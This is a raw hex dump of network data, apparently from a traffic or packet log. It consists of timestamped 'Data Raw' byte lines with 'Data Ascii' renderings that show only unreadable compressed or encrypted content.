                                                                                                                                                                                2021-11-11 11:26:10 UTC5872INData Raw: da f2 8d f8 68 91 ac 71 7b bd 54 cb 56 9f d9 2c e9 12 11 77 71 50 b9 5d a4 04 33 5a bf 73 26 64 0b c8 59 4c 01 64 ae bf 5c 97 5a 01 1e e9 42 be 45 d7 f6 e1 c7 25 5b 5e d0 5d 7c 17 6f 26 e3 d1 0a 57 bb 01 08 84 17 55 02 30 f2 95 04 e0 8f bf 60 b0 fc 7a 21 d5 2e 41 09 a8 48 10 d1 b2 77 40 16 cb 70 98 88 e2 c4 b5 61 40 56 c5 5e 62 7a 4a dc 78 68 08 f2 ee fe 57 20 a5 97 1b 02 f8 46 28 e5 4b 5f af 64 39 80 b6 ba 0a 85 4b 53 ba 29 5e 2a bb 38 36 68 0b 43 39 ea 7f dc 72 72 d5 13 21 5b 88 a9 b9 a0 68 aa 35 3a 3d 2d ba d3 92 7e 1e fc ef c9 da 7e e4 de b7 ee 82 95 97 1f af 54 a2 7a 75 d6 27 d1 68 e6 e1 04 7b 49 bf 42 5f 5b ee 3e 95 af 9d d7 ea 23 3a e5 e9 e6 6e 28 0f a2 05 86 0e 50 3b 56 28 13 4b ae cf 9e d6 e6 88 a0 68 4f e4 2d c6 7d dc ee ca cf 2e 4c 82 37 17 6f
                                                                                                                                                                                Data Ascii: hq{TV,wqP]3Zs&dYLd\ZBE%[^]|o&WU0`z!.AHw@pa@V^bzJxhW F(K_d9KS)^*86hC9rr![h5:=-~~Tzu'h{IB_[>#:n(P;V(KhO-}.L7o
                                                                                                                                                                                2021-11-11 11:26:10 UTC5888INData Raw: 16 9a 21 f0 be 9c 32 f6 bd e1 1d 57 6b 88 a3 4f 0c 1f db 7f 5f 12 ef a2 08 fc 8a 19 fd 06 2b 6f 3d 5b 7b a2 50 c1 e9 ec 88 fd 3b e4 bc a7 02 f5 ce 14 db 0d 3c f6 f5 00 ed 75 ad 96 fc 0c 5e b0 c3 15 45 f4 ee 2c fa 1e 34 d5 35 0e 76 9c 04 0b f7 87 95 36 6e a6 28 8d 26 14 0c f6 e5 16 73 24 f9 22 2c 02 4b 41 05 cc 84 a6 00 8b 59 55 8b 5b a5 18 78 60 e8 72 4f ec c1 1c 76 82 38 79 93 44 a7 80 6e 5f 68 cb 0f 08 a1 91 b2 a0 97 1c 13 8d 1b 05 c1 e8 01 70 2c 12 5a d1 60 98 16 ed f8 3f e9 58 92 84 40 ab a9 4d d3 b0 6b f7 4a ff ba cc 4d ba 5b 16 2c ac 4f 13 d4 38 3c dd 04 82 04 6e 49 e8 3d 94 96 2d 17 ab a0 c0 40 ed c6 2c c4 24 86 5f af 45 a4 b4 93 0e 32 07 c6 40 22 24 2f 9e b2 a2 7a 19 4a 80 12 1c 7d 46 37 81 54 f2 f2 60 25 b9 85 60 1a 16 c4 70 57 a6 54 09 5e 17 44
                                                                                                                                                                                Data Ascii: !2WkO_+o=[{P;<u^E,45v6n(&s$",KAYU[x`rOv8yDn_hp,Z`?X@MkJM[,O8<nI=-@,$_E2@"$/zJ}F7T`%`pWT^D
                                                                                                                                                                                2021-11-11 11:26:10 UTC5904INData Raw: 95 49 38 12 1a 91 66 6c 52 05 4f be 05 3d a4 f0 ee cc 00 22 18 fa b8 32 d0 8c ff 90 a0 0b cc 63 39 a4 82 3f 94 d5 7d 45 ab 9f e8 0a ba 3b 0c c1 a1 f2 45 6f 14 de 01 1d 5d 77 e8 ca 30 31 a6 16 36 84 b6 02 97 34 7f a1 45 1b 75 24 58 e5 e0 c8 d9 12 20 74 fe a9 5e 4c f0 67 42 dc a7 97 8b d3 62 8f f0 04 88 08 26 1c 0c 82 7b 48 5e 2d fe 77 10 be 8c e7 dd e0 85 d1 93 df e9 7a 2d a9 00 ac c6 19 76 dc c9 19 5c 84 97 73 8c 9b bb 13 7d cf 2f e2 9b 07 9b 7a be 5d d0 1c fd 8b a6 07 81 c3 42 4c fb d3 01 eb c7 2a 08 17 5d af c1 56 63 5c 80 a2 9e 70 01 75 d0 e1 16 c7 23 56 b3 80 1c 53 0b 2f d5 b5 96 82 fa d3 f1 ff 1c 21 de 49 49 72 76 39 ef 44 02 74 68 94 e7 6f fd 10 6a 56 be 00 b1 3e c7 5f b8 cb d2 11 4a f8 85 4f 82 27 c2 5d 7b 50 c3 a0 4f 01 f6 b7 c2 52 11 5b cc 29 3a
                                                                                                                                                                                Data Ascii: I8flRO="2c9?}E;Eo]w0164Eu$X t^LgBb&{H^-wz-v\s}/z]BL*]Vc\pu#VS/!IIrv9DthojV>_JO']{POR[):
                                                                                                                                                                                2021-11-11 11:26:10 UTC5920INData Raw: 65 4a 6e a7 86 04 3f f9 4d f1 b6 ba 01 2e 0e 7a b8 9a a9 f2 9e 26 31 e2 b8 10 7c 16 49 26 d2 16 a0 64 32 6e 73 89 c0 0c bd d2 a2 08 62 9d f6 ed 59 58 83 71 c0 2c 87 6d 01 4c 54 ab 44 4a 69 f3 3e e8 cd 97 f3 04 09 e9 58 4c 77 4e d2 40 e3 c5 4d 84 52 c4 37 ea 1d 80 7a 35 75 3c 4f b9 04 e1 e6 65 bd a9 ba a6 80 82 07 1f fc 2b 60 7a cc 26 40 15 f0 4e 02 c8 f6 4d 20 90 2e 33 14 dc 82 c3 b1 d4 8a 3e 46 21 4c 3e 88 f6 60 5b 68 a5 28 38 51 0c e8 9f 15 15 1c 9a bc 09 23 b1 78 0d f7 44 dd 1e 0a 32 61 20 80 86 57 55 c1 18 9b 15 56 19 00 ee 6d bd 01 77 fa a8 05 58 02 09 d8 16 2b 5a f7 b0 5b 70 70 df c9 43 d3 5f 80 20 9a 9f dc 8a 44 38 cf c5 06 49 e9 fb 46 70 ce 3a 2a 0e 9f 8f 3e 9d fe a0 00 4a d7 de d4 c1 68 97 39 00 06 df b5 b1 c7 1c 72 8b 5f dc b3 64 94 e0 17 bb 4c
                                                                                                                                                                                Data Ascii: eJn?M.z&1|I&d2nsbYXq,mLTDJi>XLwN@MR7z5u<Oe+`z&@NM .3>F!L>`[h(8Q#xD2a WUVmwX+Z[ppC_ D8IFp:*>Jh9r_dL
                                                                                                                                                                                2021-11-11 11:26:10 UTC5936INData Raw: ff 3a 45 01 27 1e 3e 44 7a e0 2a c0 5c ee 57 24 6f 30 74 4c 44 dc ce 12 c8 04 ea 01 c4 ed 3c d8 f5 3c 7e 30 b9 40 74 e5 97 60 af 34 84 07 fa 87 0f 1e ee eb 54 a2 ca 0f 6a df 29 10 55 c7 f0 0c 43 e6 14 40 9a 98 bf d4 5f 45 20 e3 11 e1 e3 7c 01 0c e5 0a 98 0c af d5 e1 2a ea 34 ff c1 96 74 aa 82 18 e1 e4 8c f1 00 d4 57 31 c7 16 db 0d 32 40 3e 90 92 5b 74 d7 2a a0 e2 bc 03 7e 67 b2 c8 ca a8 0f 78 79 59 b8 f2 b4 fb a0 02 fc eb 67 3c a7 ec 80 0b fd fa 1b 10 6f 46 6c 9c d2 9b f2 4d 8b 49 74 36 41 91 31 b3 50 e8 b1 f0 fe 88 a2 7c dc e4 9c 02 00 d6 ab 9d c3 2a b2 5a 73 b3 64 dd b8 42 12 fb fc ee b6 3e 7e a8 18 ee 86 95 46 ca 2f 42 17 5c 34 da 00 c8 8e a9 72 35 c1 98 e9 da 6d 07 e5 2d 47 90 a5 f6 99 fe 3b 47 06 c6 69 45 1a 00 d6 bf 56 44 2b 4f 50 34 ea c2 58 ac e4
                                                                                                                                                                                Data Ascii: :E'>Dz*\W$o0tLD<<~0@t`4Tj)UC@_E |*4tW12@>[t*~gxyYg<oFlMIt6A1P|*ZsdB>~F/B\4r5m-G;GiEVD+OP4X
                                                                                                                                                                                2021-11-11 11:26:10 UTC5952INData Raw: c5 ec e9 5a 06 c5 4f eb ce 6a 93 a3 25 50 a3 81 28 cd 0f d1 30 b9 80 0d 45 29 f1 9d 67 a2 25 d6 54 61 5e 40 fe 38 df 13 0d 50 00 21 8d 92 06 2d 5c bc 17 43 1e dc 90 0e 32 b2 01 50 2a 7a 8d 1a c2 03 c0 5d 40 b0 49 00 bc e9 f8 88 48 e8 0d 47 bc c3 f6 21 4f ed 0a fd f2 26 f4 25 92 0f 5d 4c 5d 97 f7 13 03 34 04 3a 2d 00 c5 7e 55 6d c2 a0 e2 2d 9f 58 b2 25 43 fd f5 c0 72 c7 a3 90 94 c2 0e 55 80 48 77 11 e9 30 15 fb 1b f9 0a 18 40 85 cc 08 6f 93 d8 ca 1e 88 4b 9e e8 f6 21 a4 75 0a 1c 4a 91 fc 21 7e f7 03 d6 42 70 f9 05 e2 9f 6f 5f dd 00 8f bd 04 30 29 ce 60 cc 1c 39 ab 72 12 00 ad 11 7d 4b d6 de c2 9a 03 d2 66 33 78 19 7a 05 94 41 85 8d 1e 05 97 e7 e2 06 91 4c 97 fc 07 48 01 3e 32 84 25 15 fc be 18 a8 0b 24 ec d7 c0 68 5e a0 25 72 aa 06 2b e7 18 1a 41 20 30 f4
                                                                                                                                                                                Data Ascii: ZOj%P(0E)g%Ta^@8P!-\C2P*z]@IHG!O&%]L]4:-~Um-X%CrUHw0@oK!uJ!~Bpo_0)`9r}Kf3xzALH>2%$h^%r+A 0
                                                                                                                                                                                2021-11-11 11:26:10 UTC5968INData Raw: e7 38 05 6f d4 ea 2a 08 0c 20 89 aa 16 5d 96 2b 7c 79 24 36 46 2e 12 1e fe 01 21 de eb 9a ed 3a 46 3f cf bb 38 08 5a 9d a2 e0 12 58 00 bc c3 6d aa f9 e3 25 89 e6 52 38 28 c9 82 8a 60 99 06 b9 57 0f da 06 81 e1 d0 af ff 27 32 37 5d b6 b3 40 04 b1 e2 c1 40 0d 05 b8 d0 6b 44 08 19 10 01 a2 ef 3d f1 03 18 03 7a 9f 70 e9 cb 48 4c 20 e7 02 2b d8 da 0c ce de e2 03 f5 c5 77 c0 06 72 e5 34 56 18 7a 5e 26 82 f4 5b 70 6a 2e 9c 55 c1 09 e4 62 08 d8 8e 27 c6 08 9d 57 9c 7e 2f 49 be 73 e0 ad 56 77 e9 da 6b b7 7c e5 82 a7 26 b3 3e 12 0b 08 93 5e 5e 76 b8 89 5c c5 f5 91 72 35 b6 2f 80 95 6b 39 b7 75 55 5c af f1 2f 5e 79 d2 6b f1 a2 c0 68 1b aa ff 4f 3f ba 3c 26 d9 12 51 8f 44 bd b4 a4 eb f8 a7 be 69 fb 77 ef 3e 4b 7e 2a 40 41 ba 6f 75 b5 d4 35 56 48 4f 77 3a 77 85 28 c3
                                                                                                                                                                                Data Ascii: 8o* ]+|y$6F.!:F?8ZXm%R8(`W'27]@@kD=zpHL +wr4Vz^&[pj.Ub'W~/IsVwk|&>^^v\r5/k9uU\/^ykhO?<&QDiw>K~*@Aou5VHOw:w(
                                                                                                                                                                                2021-11-11 11:26:10 UTC5984INData Raw: 36 cf 67 a8 38 82 96 8f 22 53 01 f2 5b ec 3b c1 d0 da cb 06 24 38 51 fd a0 70 25 4b db a2 d1 20 f7 f4 b6 82 28 5e ed 77 01 9b a0 02 88 6d ce 6f 16 24 bf 6b b1 16 f5 8b 99 87 30 58 fd 48 71 5e 5e e9 cc d6 d8 3c 54 60 5c 3c 52 56 be 2e 00 f4 d5 79 53 bb a1 4a 80 7f ed 3f de 5b ca 00 04 d9 cb dd 66 5a 98 5f 80 07 5e 55 16 bd 72 c9 ef 00 03 cd bf b3 b0 3d b8 2a 02 a0 12 46 20 09 ea 40 9b f2 df 00 0c 53 d4 31 d3 5a e9 3d 5b 80 ed be 83 76 3b 7d f7 50 f9 2c 7f 37 99 04 e5 1a ae a0 aa 28 15 02 2f 7f 22 05 cd 88 eb 4e 2c 1d 7c 40 84 b0 00 48 fe aa fb 36 0d 68 ea 1d 9d 7f 5f 41 8a 04 f9 3f 53 1c 16 4f d3 01 60 6c 41 eb 6f d4 3f e8 2d 7d 1b b8 40 f4 fd c0 2c a0 e6 90 58 0b 00 d9 3a d0 1e 34 c9 cb 8b 7c 4d 00 56 02 5a 67 cc 0f 65 3d 00 6a 25 2d b7 16 80 54 0e 00 59
                                                                                                                                                                                Data Ascii: 6g8"S[;$8Qp%K (^wmo$k0XHq^^<T`\<RV.ySJ?[fZ_^Ur=*F @S1Z=[v;}P,7(/"N,|@H6h_A?SO`lAo?-}@,X:4|MVZge=j%-TY
                                                                                                                                                                                2021-11-11 11:26:10 UTC6000INData Raw: 92 00 06 e3 38 65 8e 9c 71 0b 00 2e 3c ac 1e 70 b1 7a 99 fa 4b 00 f2 6a 8f 15 fb 42 cf 3a 07 61 af fa fd ce 20 ab c1 40 6c 07 6e c0 7a 01 51 d0 f6 44 38 1a 00 20 08 ae f5 e6 59 64 a2 72 9c 00 9b b8 2f ab b3 95 30 c8 3b cd aa 07 61 91 c3 14 40 17 7a 6e 53 00 7d a6 8a 92 56 7b 0a 59 3e 21 2f 80 18 c8 e3 10 6e 35 d0 1d 85 77 98 56 d5 00 5a d3 36 43 a2 2c 01 f8 b7 6b dd 5f 83 73 25 d1 68 0f 07 d6 41 ab 7d a5 10 45 ce ec 3c ba 48 a0 18 80 2c 83 4d 56 39 f3 00 2d 82 ae 0b 73 35 5e de ea 6e 5c 4b 92 03 b9 5b 69 6b c9 b0 85 76 a8 00 3a 6f 0f 08 aa 34 b4 99 01 e0 4f db b9 d7 1d d5 d4 1b ee 0f 28 51 dd 76 00 01 12 eb 96 50 03 c5 ca f5 9c 9b ed 98 cf 31 f4 1f b4 3b 55 39 80 e7 aa 4c e0 1a 94 ba 00 57 19 ee 37 9c be 59 2b f4 06 1e 76 f4 18 c0 ea ad 35 fd 88 83 00 7c
                                                                                                                                                                                Data Ascii: 8eq.<pzKjB:a @lnzQD8 Ydr/0;a@znS}V{Y>!/n5wVZ6C,k_s%hA}E<H,MV9-s5^n\K[ikv:o4O(QvP1;U9LW7Y+v5|
                                                                                                                                                                                2021-11-11 11:26:10 UTC6016INData Raw: a8 2b 9d d6 aa 82 a2 c2 fb 49 fb 7d 6c b1 59 9f f4 5b 5e a2 de 01 2d e9 98 b7 9e 22 cd 67 fd 94 59 a0 e8 ae 14 9d de cf c0 7d 2a 86 1a 00 e4 ad 5c f6 6a c1 43 26 e2 a4 00 f2 ea 87 36 59 1a 68 23 1d 3f 7d 77 57 18 1d 63 67 7b 13 c2 b7 0c e8 7c 1d 40 3a ff 7e 85 bd 19 c1 5d 6c 1d de 4d fe 36 c4 a5 2c af e3 19 25 1a 80 a6 b9 39 3c bf b4 02 20 b1 f2 0a 2f 2d cf 76 db 65 01 bc 86 f5 84 be 02 18 e9 b5 cc f5 ec e0 27 51 54 59 1f c9 7f 4f 64 9d 7f 96 f8 01 0f fe 49 d7 6f 3b b8 a6 e5 12 04 fe d4 f5 ef f3 d0 4b a5 94 2a dd 86 2e ca ce 7b 9d c2 46 45 26 82 67 d9 fa 7f 9e b8 25 9a 4f 5f 92 4c 57 95 d2 b1 e0 d0 07 c2 d1 c0 16 50 a4 ba b7 10 e7 bd 5f 89 4d d5 c2 7c 57 76 60 6b 50 0d 80 17 e9 7b 5a a4 b4 51 49 21 89 e4 fa 7d 65 ab 0e 20 25 12 ab a3 86 25 08 81 38 cb c4
                                                                                                                                                                                Data Ascii: +I}lY[^-"gY}*\jC&6Yh#?}wWcg{|@:~]lM6,%9< /-ve'QTYOdIo;K*.{FE&g%O_LWP_M|Wv`kP{ZQI!}e %%8
                                                                                                                                                                                2021-11-11 11:26:10 UTC6032INData Raw: ff cb f4 db b0 19 02 7c e4 e3 9c 29 d8 60 37 01 c0 a5 5b a5 51 cb 92 b7 c0 e3 ef d2 b9 3a 2e b4 5a 02 b1 13 75 4e d2 57 49 20 94 04 f2 af 8a 3a 02 e9 0e ff 48 a6 13 95 90 b8 02 9b 68 fe ee fd 3f 51 b9 3d 0f 74 21 6e d7 dc 7d 0d 00 1c fb ef 5f 2d 2b 22 98 05 6e 89 c1 58 29 ee 8b 97 1c 95 5c 38 5a ea 3a 89 4e fc 00 e9 03 17 e9 c9 0f fe 3a ff 2a 94 86 6b fc 4a bd f4 ba f2 77 fc f2 72 22 4a 77 cb f0 e2 01 a7 cd 27 04 2e 2b 5c 6b ec f7 96 42 c4 fa fb df 30 be c5 16 20 f9 06 ac 55 d3 ac 49 11 4c 29 5b b8 c6 5a fe 7c 54 05 07 bf 1c d9 7e e9 f4 4d af 8b 70 4d 80 04 6a 51 8d 5f bf a5 a5 00 09 05 db 56 27 fe 5c 5e 90 a0 08 a5 be 06 e9 f1 0d 64 76 c3 28 10 9c 06 20 33 a5 00 6b 02 7f fc 12 51 56 be 1e fe 42 df 40 81 ce f5 78 b7 6d ec e6 3b cf 0d 28 3b 46 0b ae d0 7d
                                                                                                                                                                                Data Ascii: |)`7[Q:.ZuNWI :Hh?Q=t!n}_-+"nX)\8Z:N:*kJwr"Jw'.+\kB0 UIL)[Z|T~MpMjQ_V'\^dv( 3kQVB@xm;(;F}
                                                                                                                                                                                2021-11-11 11:26:10 UTC6048INData Raw: aa f7 3f ba a2 25 ff cc fd 10 46 97 b5 04 15 80 44 89 e3 04 01 cb ee 8a 91 5a 47 b5 9f 8b 01 45 26 d1 40 c4 36 93 83 38 3d 18 48 11 27 20 7e e2 47 ad 02 10 6d 80 d7 8c 29 f9 1d 7e a9 70 28 07 9c dd cd 77 d8 5f 3c 03 b6 82 98 89 0e 48 6c 04 a3 00 7b c4 c0 7d b8 60 e9 44 bf 61 3d a9 c0 24 4f a6 3a 01 bd 00 89 23 c9 95 94 91 8d 35 3d 06 3c 04 08 cd 0b ac ec 2d 09 2c dc fb d8 67 09 eb 53 e0 c5 f7 c5 1d 61 53 e0 c5 12 eb 81 24 e9 7b f4 2f f4 2c 68 78 f9 25 bf 0c 5f 67 0c 81 c2 37 a3 b7 2b 24 af 1f 13 49 d7 52 00 62 53 19 f6 7a f7 4c d5 64 1d ba b7 67 d7 a7 b1 f0 0f cc 5c 49 35 12 5a be 69 e8 74 9e a4 3b 0f e2 07 52 09 80 01 21 da 85 29 64 2e e0 ff d5 97 40 79 ed 07 fc c5 0f fc fd ba 83 7f 89 ea 5d 09 00 77 22 9b eb ec 09 f7 64 24 08 ad 14 54 19 20 ee 28 f0 ed
                                                                                                                                                                                Data Ascii: ?%FDZGE&@68=H' ~Gm)~p(w_<Hl{}`Da=$O:#5=<-,gSaS${/,hx%_g7+$IRbSzLdg\I5Zit;R!)d.@y]w"d$T (
                                                                                                                                                                                2021-11-11 11:26:10 UTC6064INData Raw: 07 8e 85 dc 92 43 90 d5 3e 2c fd e4 23 0f d4 4d c0 3a c3 47 20 05 f3 b6 b8 17 06 86 02 84 96 1b d4 e2 59 e1 c9 b7 fc cc 73 07 6c 62 c6 18 01 77 50 3b 75 32 22 7f 68 b9 a7 02 25 bc 1a a0 52 56 f2 6b c2 17 e9 03 69 4c 3c 87 e4 90 1f bc 9a 91 66 b1 17 80 94 dd a0 65 84 10 09 dd 7f c2 c1 e5 07 58 58 0b f1 f8 7b 7d d8 80 05 16 31 b6 0c c1 ab b4 65 f5 4e 5e bf 01 0f eb 4c 31 5c 64 5d 5b 96 6f eb 70 d0 01 25 fa be 7d e9 5a 63 bf e0 f0 4f 67 e8 c8 4f 8c 52 dc 10 c2 e5 5f 42 0c 4a b8 3c c1 18 fd 66 02 42 0c d7 78 b5 7c 6b 30 fb 03 18 a4 bc a1 04 68 ef 04 3b 7f be 8c 19 fa 7c c5 4e 4b f9 71 9c d6 ca ba 65 3b b0 aa 04 06 3a 10 b4 45 31 28 aa 15 77 e8 52 11 ae b5 eb 1a 69 f8 36 ff 4d 96 13 58 f2 27 f2 3d 5d 42 05 d7 f1 fb 72 7f f9 b5 c4 df a6 bc 3a e9 30 16 26 9a 97
                                                                                                                                                                                Data Ascii: C>,#M:G YslbwP;u2"h%RVkiL<feXX{}1eN^L1\d][op%}ZcOgOR_BJ<fBx|k0h;|NKqe;:E1(wRi6MX'=]Br:0&
                                                                                                                                                                                2021-11-11 11:26:10 UTC6080INData Raw: fb 0e dd a3 a2 e4 5d 00 b6 9c c4 6d b0 f1 1c b4 02 81 81 ba db 43 80 d0 d4 15 7a 3c 1b 21 bc 83 00 ac 24 87 52 61 2e 90 00 88 e5 c7 b0 e7 37 51 d7 07 ca f1 f5 8e f7 c0 c4 3e de 0b 0e d6 a9 5f 6e cf 0f 57 01 19 07 84 98 89 70 ea 54 00 99 72 04 35 91 17 46 3e e0 70 01 8c fd 92 6b a7 94 8e 60 d3 2b 00 14 23 c0 c9 09 10 ba b8 00 eb 35 96 e4 3d 20 1b 77 00 db dd 5f ac 1c 62 e1 ba 00 58 97 a4 5a be 1f 4a ef 71 b9 00 82 3b d9 25 bd e2 81 06 1d 32 d1 61 80 ab 59 b8 0d 6c a4 00 0a 35 74 3d ac c8 0e f6 00 65 f0 5b c6 5c 9b 80 a8 00 b0 62 bf 57 e4 01 48 35 01 ee 19 aa 3f 95 5e 3c d8 1c 8f 00 c0 d0 ce d2 64 5b 1b 84 00 0d e6 63 47 b5 92 74 5a 00 ba 66 ed 91 19 f0 03 b2 01 97 90 bc 49 82 64 41 dc 31 9c 3e 0e 43 8b 86 2d d7 09 7e 80 a8 82 2e 76 e9 4b b6 e9 c2 88 27 80
                                                                                                                                                                                Data Ascii: ]mCz<!$Ra.7Q>_nWpTr5F>pk`+#5= w_bXZJq;%2aYl5t=e[\bWH5?^<d[cGtZfIdA1>C-~.vK'
                                                                                                                                                                                2021-11-11 11:26:10 UTC6096INData Raw: dc 80 00 6d ef 3d 1e 7c e7 b7 d7 00 d1 61 94 85 86 15 1d f3 1d 62 fb fd c0 d0 89 48 ed a8 a4 00 2a 60 7c fe a6 0a 46 f8 2e eb a1 cb 00 80 a5 24 3c 7a 77 00 d8 b7 f1 14 b3 69 22 25 00 e9 01 e6 ed 94 21 97 c6 00 f0 90 53 78 8a c7 6c 29 01 a2 26 96 ef 0b 24 49 cc 34 27 38 db 1e 00 9f 4f d6 7e 70 8e fb 00 bb 9a 4c 51 fd ce 76 1d 00 da d7 a9 11 cf 7a 8a 3f 00 27 b3 d6 df e0 a3 f8 c5 01 23 f9 fc 8b 41 52 75 c8 6a 7a 1e 70 78 05 01 1a 8f 7b 77 84 30 99 7d 0f 0b 06 a4 fb 6f dd fe 01 d2 c0 36 e9 b1 20 09 09 00 3c 9a f3 28 66 a6 a4 31 00 6d 5f 63 a3 fb ee f2 e8 00 5a 2c 46 4c b4 c0 1a 68 01 ac e3 0a be 44 a3 ae 2a b0 74 77 00 f7 9d c1 39 9e f2 2f 8b fc 29 79 35 0f 7f 44 93 e6 e0 1a 1f c8 3c f6 0e d9 a4 cb 25 80 af 4d 2d d4 50 72 b7 e8 5f 77 6f 24 3a e7 6d 00 1a 61
                                                                                                                                                                                Data Ascii: m=|abH*`|F.$<zwi"%!Sxl)&$I4'8O~pLQvz?'#ARujzpx{w0}o6 <(f1m_cZ,FLhD*tw9/)y5D<%M-Pr_wo$:ma
                                                                                                                                                                                2021-11-11 11:26:10 UTC6112INData Raw: 89 2a 41 05 ce 19 ac 73 62 c7 27 93 9a 4d f8 b8 1c 5a 00 63 03 7b 8b 43 d5 a3 6b 07 7c 66 2e d6 62 d0 3d dc 0c f5 00 ac 8c a2 64 76 f8 86 80 00 8d c4 37 81 8a d6 99 4c 00 cc 90 fb 14 16 89 ec 5a 3b 6c 45 0f e1 78 4f 00 ab fd 1f 62 69 00 d0 3e af d8 e3 7c cb c1 0e 2d 52 24 8c 00 12 7b e7 e8 80 1d fe 63 45 c0 f1 d3 e1 c0 a9 22 00 93 33 e2 c9 23 03 d7 c2 0f ea 12 7e 08 8f db 3f c0 09 2f 3a 9e 67 24 00 bc 8b 3e 75 6b 28 e7 97 00 01 57 d6 e6 da 9b 31 ec 1f b4 20 39 c5 cd 08 f3 80 45 93 b5 a1 75 15 00 2a 1d 99 5e 53 4d f4 0d 75 86 00 88 b9 ae 48 1e 68 db 76 00 0e f2 4b de 92 7d 87 8e 00 a3 a8 e4 c8 6d ad 9a f1 00 e3 01 fb d2 20 2c 68 1d 0e ec 59 bb 7c 80 79 dc f1 30 65 01 a6 84 88 9c 3a bc 55 d0 03 33 00 3b b6 5b d2 64 8a 5d 45 00 56 84 99 f1 76 ca 8f a8 1d af
                                                                                                                                                                                Data Ascii: *Asb'MZc{Ck|f.b=dv7LZ;lExObi>|-R${cE"3#~?/:g$>uk(W1 9Eu*^SMuHhvK}m ,hY|y0e:U3;[d]EVv
                                                                                                                                                                                2021-11-11 11:26:10 UTC6128INData Raw: ce 17 53 36 b6 00 0a aa dd 47 d4 4e 79 13 00 2b 73 e5 72 a0 2c 18 af 00 d6 9c 99 d0 b7 0b f7 66 00 e3 94 36 54 87 2f f5 9f 07 0c 0f 39 cc 59 00 7a 38 24 1b 00 58 ad 4f 83 5c be f5 b9 00 e9 f2 cc 7b 45 0c 76 3b 77 4c 00 62 66 97 3d aa 99 7a 26 00 01 a8 6c bb cb 3f d3 e6 ee 4d 00 7e 05 78 ea d2 4b 8f 6e f4 f9 00 79 ac bf a9 86 1b db e8 00 8b 9c 8c 45 19 07 5e d1 07 66 7f e1 69 ad 10 ee 46 a2 1e 1c 8a c0 b7 40 35 d1 3f 44 e6 d2 00 20 b5 41 c4 0e b9 1f 85 16 59 42 c6 00 89 d5 1d 51 ea 69 1c 91 64 0f 00 5d 50 36 42 cb 09 03 79 85 be 1b 2f 11 98 3c 2c 5b 00 cc ed 2e ae ab 4b 1a bd 00 66 a9 90 95 c6 3f f9 05 1d 14 2b 31 43 86 24 53 12 d3 fe b0 22 92 a8 00 e7 e2 a9 bd 2c d0 8c 20 03 9e a3 3c 01 4f 8b d8 63 76 c4 71 87 00 c5 11 1d a4 65 17 5e a1 00 97 2d 2a 24 de
                                                                                                                                                                                Data Ascii: S6GNy+sr,f6T/9Yz8$XO\{Ev;wLbf=z&l?M~xKnyE^fiF@5?D AYBQid]P6By/<,[.Kf?+1C$S", <Ocvqe^-*$
                                                                                                                                                                                2021-11-11 11:26:10 UTC6144INData Raw: b2 9d 50 70 13 53 54 5b ee 2e a0 22 55 2d e9 4c c2 b9 55 e7 c4 42 52 55 d4 ed 02 49 19 3f 67 1a f7 c6 06 ca 82 c2 12 25 f7 e6 a2 25 02 30 b0 21 75 51 ae a1 28 47 b9 bc 69 0c 15 f7 1f 12 a3 97 84 e9 94 27 8a fd 16 58 55 2f 14 4e 71 c5 db 19 07 56 6d 15 04 68 4a c6 fc 5f af ed 0e 81 3c ff dc 66 7e f8 f9 b5 e2 7b f7 b5 f2 04 25 e9 32 aa 8e 27 4b cf 25 04 b8 b2 af 73 fa ad 69 b1 58 35 40 15 e9 93 ff c7 03 75 f0 84 55 fb 60 ff c1 2e 7f e3 08 52 2f 54 5a d4 38 76 81 21 51 82 53 6e c0 1f 58 a5 cf 5a f2 61 f4 0a 8f ea 1f 0d e9 a3 b9 d4 88 d9 c0 0a 8b 28 9c a8 43 00 c1 69 b6 df ef 36 59 c3 00 9b e2 33 2c ee 51 90 4e 00 1c f0 12 4d c1 01 fe 64 fc b1 3e df 9e 2e 04 af 00 a4 0a ce 12 bd da 3b 18 cf be 25 80 a1 c9 0c e6 45 9e 24 00 a7 99 54 2d 03 c5 fd a5 00 4d de 16
                                                                                                                                                                                Data Ascii: PpST[."U-LUBRUI?g%%0!uQ(Gi'XU/NqVmhJ_<f~{%2'K%siX5@uU`.R/TZ8v!QSnXZa(Ci6Y3,QNMd>.;%E$T-M
                                                                                                                                                                                2021-11-11 11:26:10 UTC6160INData Raw: 37 6a bd f3 98 4c ba f4 74 33 3a 66 31 00 29 3b 69 de 25 ca 11 00 23 4d 53 38 1e b5 03 d0 07 34 d9 fd b9 63 d0 78 12 05 88 00 84 89 4a 64 28 44 de 81 17 87 2f 7f 00 01 5a 2b ad 1b 39 00 25 ea 22 c1 38 32 5e 33 00 05 73 72 06 40 c4 fd 68 00 eb 54 b8 2f d2 8e 92 24 0b 32 fc f1 63 f7 8f de c2 b5 56 64 40 8c 95 8c 38 9f ef 00 8f d4 6e f8 23 98 1f 00 ac eb 90 a5 ae 07 b9 18 01 12 3d 33 56 53 b6 f1 d4 b8 ef 00 7d a8 7e ae fd 54 cc 1d 48 85 9e 24 fa 64 00 35 d2 16 1a c1 b8 79 61 03 5d 94 0f 76 b0 9c e0 c7 22 33 00 c3 b6 b1 0a 5f 49 38 f0 00 54 01 cc 25 d3 2b fe 52 ec d1 38 5e dd 80 5d f3 6b 31 36 ed 73 03 d6 6a b8 94 ad ee c8 e2 07 8a 00 06 79 82 57 1c a4 46 67 00 eb 91 28 75 c3 f8 b2 10 00 43 af 97 a0 e7 d6 83 9f 00 3c 09 03 78 77 2f 62 74 26 cc 91 f8 17 28 00
                                                                                                                                                                                Data Ascii: 7jLt3:f1);i%#MS84cxJd(D/Z+9%"82^3sr@hT/$2cVd@8n#=3VS}~TH$d5ya]v"3_I8T%+R8^]k16sjyWFg(uC<xw/bt&(
